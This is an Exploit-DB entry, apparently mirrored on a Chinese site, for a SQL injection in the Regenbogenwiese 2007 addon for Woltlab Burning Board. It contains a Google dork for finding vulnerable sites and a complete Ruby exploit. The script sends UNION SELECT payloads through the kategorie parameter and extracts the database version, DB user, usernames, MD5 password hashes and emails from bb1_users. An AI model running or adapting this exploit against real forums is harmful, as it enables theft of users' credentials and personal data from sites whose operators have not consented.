Woltlab Burning Board Regenbogenwiese 2007 Addon – SQL Injection - 体验盒子

作者： Easy Laster
日期： 2013-10-17
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/29023/
# Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit
# Google Dork: inurl:regenbogenwiese.php wbb (and more)
# Date: 04.09.2013
# Exploit Author: Easy Laster
# Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe
# Version: 1.5
# Tested on: Windows 8/Backtrack
#

#!/usr/bin/ruby
#secunet.cc
#30.07.2013
#regenbogenwiese.php?kategorie='+union+select
#+1,1,1,1,1,1,concat(database(),0x3a,user(),0x
#3a,userid,0x3a,password,0x3a,username,0x3a,em
#ail),1,1,1,1,1,1,1,1+bb1_users+where+userid=1--+
#Discovered and Vulnerability by Easy Laster
print "
################################################################
#secunet.cc#
################################################################
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
#Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection#
# (regenbogenwiese.php, kategorie param) #
#Exploit #
# Using Host+Path+id #
#www.demo.de + /wbb/ + or + / + 1#
# Easy Laster#
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
################################################################
"
require 'net/http'
block = "################################################################"
print ""+ block +""
print "\nEnter Target Name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter Script Path (/wbb/ or /)->"
path=gets.chomp
print ""+ block +""
print "\nEnter The ID From User (id)->"
userid=gets.chomp
print ""+ block +""
begin
dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0x7e,"+
 "0x27,version(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+where+userid="+
 ""+ userid +"--+"
 http = Net::HTTP.new(host, 80)
 resp= http.get(path+dir)
 print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]

dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
"at(0x27,0x7e,0x27,user(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users"+
"+where+userid="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nDatabase User-> "+(/'~'(.+)'~'/).match(resp.body)[1]

 dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
 "(0x27,0x7e,0x27,userid,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+wh"+
 "ere+userid="+ userid +"--+"
 http = Net::HTTP.new(host, 80)
 resp= http.get(path+dir)
 print "\nID Account-> "+(/'~'(.+)'~'/).match(resp.body)[1]

 dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
 "(0x27,0x7e,0x27,username,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
 "here+userid="+ userid +"--+"
 http = Net::HTTP.new(host, 80)
 resp= http.get(path+dir)
 print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]

dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
"(0x27,0x7e,0x27,password,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
"here+userid="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]

 dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
 "at(0x27,0x7e,0x27,email,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+"+
 "where+userid="+ userid +"--+"
 http = Net::HTTP.new(host, 80)
 resp= http.get(path+dir)
 print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
print "\n" 
print ""+ block +""
 print "\n"
 print "
################################################################
#Greetings #
################################################################
-#------------------------+ | |#---------------------+
-#------------------------+_|_|_ #---------------------+
-#------------------------+(o o) #---------------------+
-#------------------------+ooO--(_)--Ooo-#---------------------+
################################################################
 "
 rescue
print "\nExploit Failed"
end